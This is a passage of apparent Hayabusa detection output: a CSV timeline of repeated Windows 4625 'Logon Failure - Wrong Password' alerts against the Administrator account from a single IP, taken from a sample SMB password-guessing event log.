AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.271 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.555 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.637 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.769 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:26.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.247 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.661 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.893 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:27.970 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.394 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.481 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:28.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.121 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.672 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:29.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 